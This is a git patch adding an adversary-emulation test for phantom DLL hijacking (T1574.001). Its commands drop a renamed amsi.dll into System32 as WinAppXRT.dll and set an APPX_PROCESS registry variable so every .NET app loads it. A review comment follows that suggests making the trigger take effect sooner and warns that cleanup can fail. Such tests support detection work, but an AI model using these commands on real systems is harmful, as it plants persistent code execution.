From 13f7dde9a35efb11fa84ec8b33eb569a0940457d Mon Sep 17 00:00:00 2001
From: abhijose09
Date: Wed, 24 Jul 2024 20:06:55 +0530
Subject: [PATCH] Update T1574.001.yaml (#2877)

New test Added : Phantom Dll Hijacking - WinAppXRT.dll

Co-authored-by: Carrie Roberts
---
 atomics/T1574.001/T1574.001.yaml | 23 ++++++++++++++++++++++-
 1 file changed, 22 insertions(+), 1 deletion(-)

diff --git a/atomics/T1574.001/T1574.001.yaml b/atomics/T1574.001/T1574.001.yaml
index 663e851cff..2523fa12d5 100644
--- a/atomics/T1574.001/T1574.001.yaml
+++ b/atomics/T1574.001/T1574.001.yaml
@@ -19,4 +19,25 @@ atomic_tests:
 del %APPDATA%\updater.exe >nul 2>&1
 del %APPDATA%\amsi.dll >nul 2>&1
 name: command_prompt
- elevation_required: true
\ No newline at end of file
+ elevation_required: true
+- name: Phantom Dll Hijacking - WinAppXRT.dll
+ description: | .NET components (a couple of DLLs loaded anytime .NET apps are executed) when they are loaded they look for an environment variable called APPX_PROCESS Setting the environmental variable and dropping the phantom WinAppXRT.dll in e.g. c:\windows\system32 (or any other location accessible via PATH) will ensure the WinAppXRT.dll is loaded everytime user launches an application using .NET. Upon successful execution, amsi.dll will be copied and renamed to WinAppXRT.dll and then WinAppXRT.dll will be copied to system32 folder for loading during execution of any .NET application.
+ supported_platforms:
+ - windows
+ executor:
+ command: | copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll ren %APPDATA%\amsi.dll WinAppXRT.dll copy %APPDATA%\WinAppXRT.dll %windir%\System32\WinAppXRT.dll reg add "HKEY_CURRENT_USER\Environment" /v APPX_PROCESS /t REG_EXPAND_SZ /d "1" /f
+ cleanup_command: | reg delete "HKEY_CURRENT_USER\Environment" /v APPX_PROCESS /f del %windir%\System32\WinAppXRT.dll del %APPDATA%\WinAppXRT.dll
+ name: command_prompt
+ elevation_required: true
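Review bot: The cleanup's `del %windir%\System32\WinAppXRT.dll` will fail while any .NET process that picked up APPX_PROCESS still has the DLL mapped, so the test can report itself cleaned up while a hijack DLL that every .NET process of that user loads is still sitting in System32. The cleanup should tolerate that the way the preceding test's cleanup lines do, e.g. `del %windir%\System32\WinAppXRT.dll >nul 2>&1` and `del %APPDATA%\WinAppXRT.dll >nul 2>&1`, and the description should state that a logoff or reboot and a second cleanup run may be needed before the file can be removed. Separately, `reg add "HKEY_CURRENT_USER\Environment" /v APPX_PROCESS ...` writes the value but, as far as I can tell, does not broadcast the environment change, so applications launched from the current shell or Explorer will presumably not see APPX_PROCESS until the user logs off and on; `setx APPX_PROCESS 1` would make the trigger take effect for newly launched apps without re-login. The intermediate copy-then-rename through `%APPDATA%` is also unnecessary and makes the `ren` fail on a re-run if a stale `%APPDATA%\WinAppXRT.dll` survived a failed cleanup; `copy %windir%\System32\amsi.dll %windir%\System32\WinAppXRT.dll` drops the phantom DLL in one step.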